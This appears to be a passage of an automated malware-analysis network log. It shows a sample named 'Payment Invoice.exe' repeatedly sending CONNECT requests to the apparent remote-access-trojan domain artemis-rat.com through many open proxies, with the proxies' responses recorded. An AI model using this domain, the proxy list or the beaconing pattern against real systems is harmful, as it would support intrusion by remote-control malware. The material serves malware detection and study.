                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1300192.168.2.45400235.190.107.16300007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.261986017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1301192.168.2.454022172.67.181.103807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.262044907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.416742086 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1302192.168.2.454024172.67.181.58807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.262190104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.416721106 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1303192.168.2.454033104.16.108.149807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.263009071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.417341948 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1304192.168.2.45384127.76.193.21310807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.263092995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1305192.168.2.453581117.160.250.133807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.263253927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.480060101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.209697962 CET303INHTTP/1.1 400 Bad Request
                                                                Server: openresty
                                                                Date: Mon, 11 Mar 2024 15:15:22 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 154
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1306192.168.2.453043115.127.13.15488807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.267726898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.084270954 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1307192.168.2.45315734.30.26.17731287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.267851114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.324037075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.564754009 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1308192.168.2.453916103.23.100.141457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.271029949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1309192.168.2.45398367.43.227.227290957076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.281939983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.927409887 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1310192.168.2.453925143.64.8.2180807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.281941891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1311192.168.2.454069104.18.81.76807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.284104109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.442157030 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1312192.168.2.454075104.25.115.125807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.284775019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.442447901 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1313192.168.2.453826175.183.82.22181977076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.290909052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1314192.168.2.454057104.20.179.187807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.292193890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.446479082 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1315192.168.2.45234024.249.199.441457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.339220047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1316192.168.2.453944202.131.65.110807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.407433987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.886622906 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1317192.168.2.453652117.160.250.131807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.431309938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.620831966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.251302958 CET303INHTTP/1.1 400 Bad Request
                                                                Server: openresty
                                                                Date: Mon, 11 Mar 2024 15:15:22 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 154
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1318192.168.2.454036194.4.50.94123347076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.435699940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1319192.168.2.453877203.112.134.7456787076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.435739040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1320192.168.2.45396689.168.121.17531287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.441994905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.756058931 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1321192.168.2.45196740.127.8.243807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.442358017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.480052948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:40.364128113 CET97INHTTP/1.0 200 Connection Established
                                                                Proxy-agent: Apache/2.4.37 (Oracle Linux) OpenSSL/1.1.1k


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1322192.168.2.45313275.119.145.169380237076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.442610025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.514889956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.527081966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:32.527424097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:44.620461941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:56.714284897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:08.823730946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:32.825951099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:20.823673964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1323192.168.2.453865175.183.82.221807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.442878008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1324192.168.2.453940185.101.16.52807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.446340084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1325192.168.2.453083200.251.41.6180027076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.447323084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
